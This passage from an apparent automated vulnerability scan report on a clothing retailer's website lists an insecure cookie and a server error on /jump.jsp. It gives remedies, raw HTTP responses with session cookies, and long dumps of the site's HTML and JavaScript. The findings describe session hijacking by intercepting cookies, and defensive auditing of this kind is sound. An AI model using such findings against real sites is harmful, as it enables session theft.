Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

<script type="text/javascript">
<!--

var perzErrMsg = "";
function formValidate() {
var blnIsValid = true;
var blnValidQty = false;
var bIsCheckout = false;
var sCheckoutMsg = "";
var bIsPerzValid = true;

//alert("ATBOCO Value: " + document.ProductDetail.ATBOCO.value);
if(document.ProductDetail.ATBOCO.value == "1"){
bIsCheckout = true;
}
//alert("ATBOCO: " + document.ProductDetail.ATBOCO.value + ", Is Checkout: " + bIsCheckout);
var blnCustomOptions = false; //added for customization
for (i=0;i<document.ProductDetail.elements.length;i++){
var strSuffix = "";
var elementName = document.ProductDetail.elements[i].name;
//alert("Name: " + elementName + ", Type: " + document.ProductDetail.elements[i].type + ", Value: " + document.ProductDetail[elementName].value);
if (elementName.indexOf("qty") == 0) {
// if the quantity is greater than zero then check the
// options to make sure they've been set.
var qtyval=0;

qtyval = document.ProductDetail[elementName].value;

// GRG Added check for qty to be larger than 5 per cbrt request #03048.
if ((qtyval > 0) && (qtyval < 6)) {
blnValidQty = true;
if (elementName.length > 3) {
// multi-product
strSuffix = elementName.substring(3);
}
// Build CheckOut Message
sCheckoutMsg += "\r\n" + qtyval + " " + eval("document.ProductDetail." + "pName" + strSuffix + ".value");
// Search for options...
var strOptName = "options" + strSuffix;
for (j=0;j<document.ProductDetail.elements.length;j++) {
if (document.ProductDetail.elements[j].name == strOptName) {

if (document.ProductDetail.elements[j].type == "select-one") {
var intSelected = document.ProductDetail.elements[j].selectedIndex;
if(document.ProductDetail.elements[j].options[intSelected].value == 0) {
blnIsValid = false;
}
}// end select handler
}// end name check
}// end for(j)
if(blnIsValid && blnValidQty && bIsPerzValid) {
bIsPerzValid = validatePersonalization(strSuffix);
//alert (bIsPerzValid);
}
} //if (qtyval > 0)
} //end if (elementName.indexOf("qty") == 0)
//Added for Customization
if (elementName == "CustOptions") {
blnCustomOptions = true;
//alert("Custom - True");
} //else { alert("Custom - False"); }
} //end for (i=0;i<document.ProductDetail.elements.length;i++)
if (blnCustomOptions) {
if (document.ProductDetail.CustomOptionId.value == 0) {
alert("Select valid Custom Option.");
blnIsValid = false;
}
}//end if (blnCustomOptions)
//End Customization

var ns4 = (document.layers)? true:false
//alert("is checkout? " + bIsCheckout);
//alert("checkout msg: " + sCheckoutMsg);
//alert("Is NetScape: " + ns4);
if(bIsCheckout){
if(sCheckoutMsg!=""){
if(!confirmCheckout(sCheckoutMsg)){
blnValidQty = true;
blnIsValid = true;
document.ProductDetail.ATBCCO.value = "1";
}
} else {
blnValidQty = true;
blnIsValid = true;
}
}
if (!blnIsValid) {
alert("Select valid option(s).");
}else if (!blnValidQty) {
if(bIsCheckout){
blnIsValid = true;
}else{
if (qtyval > 0) {
alert("Please limit your order to quantities of 5 or less. For larger orders please contact customer service. ");
}
else {
alert("A quantity has not been entered. ");
}
blnIsValid = false;
}
} else if(!bIsPerzValid) {
alert(perzErrMsg);
blnIsValid = false;
}
return blnIsValid;
//return false;

}

function setATBOCO(inValue) {
document.ProductDetail.ATBOCO.value=inValue;
//alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
return true;
}
function checkoutForNS_onclick() {
document.ProductDetail.ATBOCO.value="1";
alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
if(formValidate){
document.ProductDetail.submit();
}
}
function confirmCheckout(sItemsIn) {
var sCheckoutMsg = "Do you wish to add the following items to\r\nyour shopping basket before you check out?\r\n" + sItemsIn;
if (confirm(sCheckoutMsg)) {
return true;
}else {
return false;
}
}
function selectCustomOption(frm){
//alert (frm.CustomOptionId.value);
var iCustomOptionId = frm.CustOptions.options[frm.CustOptions.selectedIndex].value;
frm.CustomOptionId.value = iCustomOptionId ;
//alert(frm.CustomOptionId.value);
}

function formValidateCustomize(frm){
var bValid = true;
//alert(document.ProductCustomize.prompt1.value);
if (document.ProductCustomize.prompt1.value == "") {
bValid = false;
alert ("Please enter customization information in the fields provided.");
}
return bValid
}

function gotoNewWindowRememberSettings(oSelect, sProductID) {
var ns4 = (document.layers)? true:false
var ie4 = (document.all)? true:false
if (oSelect.options[oSelect.selectedIndex].value == -1) {
document.ProductDetail.ANSA.value=sProductID;
document.ProductDetail.submit();
}else{
document.ProductDetail.ANSA.value="0";
}
}

function validatePersonalization(rowNo) {
perzErrMsg = "";
var shfCode = getHiddenVariableForDetailPage("row_"+rowNo+"_perzShfCode");
var menu = document.getElementById("perzid_"+ rowNo+"_0");

if(menu) {
var selectedVal = menu[menu.selectedIndex].value;
//alert (' selectedVal :' + selectedVal);

// Monogramming validation
if(shfCode == 'M') {

var textField = document.getElementById("perzid_"+ rowNo+"_1");
// if menu is not selected but there is a value in text field message the user
if( (selectedVal == "0" || selectedVal == "None") && (textField.value !='') ){
perzErrMsg = "Please select Style.";
return false;
}else if( (selectedVal !="0" && selectedVal != "None") && textField.value=='' ){
perzErrMsg = "Please enter Initials.";
return false;..

Cookie Not Marked As Secure

1 TOTAL

IMPORTANT

CONFIRMED

A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

See the remedy for solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp

Identified Cookie

order

Request

GET /jump.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 19:25:38 GMT
Server: Apache
ETag: "AAAAS53/hXn"
Last-Modified: Wed, 02 Mar 2011 19:14:23 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381174; Path=/; Expires=Wed, 16-Mar-2011 19:14:23 GMT,customer=92645544; Path=/; Expires=Thu, 28-Feb-2019 19:14:23 GMT,mmlID=68409734; Path=/; Expires=Thu, 28-Feb-2019 19:14:23 GMT,JSESSIONID=aoK3UJAPj_Oh; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>The Territory Ahead</title>

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

</head>
<body class="main" >


<script language="javascript1.1" src="/text/cm/eluminate.js"></script>
<script language="javascript1.1" src="/text/cm/cmdatatagutils_territoryahead.js"></script>

<script language="javascript1.1" src="/includes/cm/cmtaggingservices_TTA_top.js"></script>




<div id="main-background"><div id="container">

<table align="center" border=0 width=980 cellpadding=0 cellspacing=0>
<tr>
<td colspan="5" class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
<td colspan=3 class=navheaderbg>





<table border=0 width=980 cellpadding=0 cellspacing=0>

<tr>
<td class="navheaderbg2"><a href="javascript:openMe('/text/customerservice/livechatpop.jsp?iProductID=','MoreInfo');"><img src="/images/us/global/globalnav/phnumber.gif" border="0" alt="1-800-882-4323" title="Live Chat"></a></td>
<td class="navheaderbg2" align="right"><table border="0" cellspacing="0" cellpadding="0" align="right">
<tr valign="middle">

<td><a href="https://www.territoryahead.com/account/login/loginmain.jsp" onMouseOver="rollover('top_login','/images/us/global/globalnav/login_on.gif');" onMouseOut="rollover('top_login','/images/us/global/globalnav/login_off.gif');"><img src="/images/us/global/globalnav/login_off.gif" border=0 alt="Log In" name="top_login"></a></td>

<td><a href="https://www.territoryahead.com/account/orderhistory/orderstatus.jsp" onMouseOver="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_on.gif');" onMouseOut="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_off.gif');"><img src="/images/us/global/globalnav/orderstatus_off.gif" border=0 alt="Order Status" name="top_orderstatus"></a></td>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=195&itemType=CATEGORY&path=1%2C3%2C195" onMouseOver="rollover('top_customerserv','/images/us/global/globalnav/customerserv_on.gif');" onMouseOut="rollover('top_customerserv','/images/us/global/globalnav/customerserv_off.gif');"><img src="/images/us/global/globalnav/customerserv_off.gif" border=0 alt="Customer Service" name="top_customerserv"></a></td>
<td><a href="http://www.territoryahead.com/shopping/catalogquickshop/cqsmain.jsp" onMouseOver="rollover('top_cqs','/images/us/global/globalnav/catquickshop_on.gif');" onMouseOut="rollover('top_cqs','/images/us/global/globalnav/catquickshop_off.gif');"><img src="/images/us/global/globalnav/catquickshop_off.gif" border=0 alt="Catalog Quickshop" name="top_cqs"></a></td>

<td class="navheaderbg3"><a href="http://www.territoryahead.com/basket/basketmain.jsp" onMouseOver="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_on.gif');" onMouseOut="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_off.gif');"><img src="/images/us/global/globalnav/shopbasket_off.gif" border=0 alt="Shopping Bag" name="top_shopbasket"></a></td>
<td class="navheaderbg3"><div class="iteminbagtext" nowrap>  (0 items) </div></td>
</tr>
</table></td>
</tr>
<tr>
<td colspan="2" class="navheaderrule1"><img src="/images/us/global/globalgraphics/spacer01.gif" width="980" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="2"><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE"><img alt="The Territory Ahead" src="/images/us/global/globalnav/logo01.jpg" border="0"></a></td>
</tr>
<tr>
<td colspan="2"><table id="menu" border="0" cellspacing="0" cellpadding="0" width="980">
<tr>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE" onMouseOver="rollover('top_home','/images/us/global/globalnav/home_on.gif');" onMouseOut="rollover('top_home','/images/us/global/globalnav/home_off.gif');"><img src="/images/us/global/globalnav/home_off.gif" border=0 alt="Home" name="top_home"></a></td>
<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=1057&path=1%2C2%2C1057' onmouseover="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_on.gif');popup('Menu1057','MenuImg1057');" onmouseout="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_off.gif');popdown();"><img border="0" name="MenuImg1057" id="MenuImg1057" src="/images/us/global/globalnav/globalnav04_off.gif" alt="What's New"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4' onmouseover="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_on.gif');popup('Menu4','MenuImg4');" onmouseout="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_off.gif');popdown();"><img border="0" name="MenuImg4" id="MenuImg4" src="/images/us//global/globalnav/globalnav01_off.gif" alt="Men's Territory"></a></td>
<!--<td><a href="http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4" onMouseOver="rollover('LeftMen's Territory','/images/us//global/globalnav/globalnav01_on.gif');" onMouseOut="rollover('LeftMen's Territory','/images/us//global/globalnav/globalnav01_off.gif');"><img border="0" name="LeftMen's Territory" src="/images/us//global/globalnav/globalnav01_off.gif" alt=..

Internal Server Error

1 TOTAL

LOW

CONFIRMED

The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp

Request

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 19:25:44 GMT
Server: Apache
ETag: "AAAAS53+var"
Last-Modified: Wed, 02 Mar 2011 19:10:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381443; Path=/; Expires=Wed, 16-Mar-2011 19:10:58 GMT,customer=92645613; Path=/; Expires=Thu, 28-Feb-2019 19:10:58 GMT,mmlID=68409912; Path=/; Expires=Thu, 28-Feb-2019 19:10:58 GMT,JSESSIONID=ekA1XyOnsLCb; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>The Territory Ahead</title>

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & 